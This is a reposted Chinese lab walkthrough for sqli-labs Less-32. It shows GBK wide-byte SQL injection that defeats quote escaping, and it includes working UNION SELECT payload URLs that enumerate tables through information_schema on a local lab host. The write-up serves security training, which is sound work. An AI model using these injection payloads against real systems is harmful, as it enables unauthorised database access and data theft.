sqli-labs less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符(代

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符(代相关的知识,希望对你有一定的参考价值。

技术分享图片

转义函数,针对以下字符,这样就无法闭合引号,导致无法注入

‘  -->  \\‘

"  -->  \\"

\\  -->  \\\\

技术分享图片

但是,当mysql的客户端字符集为gbk时,就可能发生宽字节注入,参照 http://netsecurity.51cto.com/art/201404/435074.htm

%df‘  -->  %df\\‘  %df%5c‘

这样引号就被闭合了,至于%df%5c就成了汉字 運

技术分享图片

成功闭合

http://192.168.136.128/sqli-labs-master/Less-32/?id=1%df‘

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df‘ union select 1,2,3%23

技术分享图片

表名

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1%23

技术分享图片

 

以上是关于sqli-labs less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符(代的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs Less32-Less37

sqli-labs Less32-Less37

sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)

Sqli-Labs less32-37

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)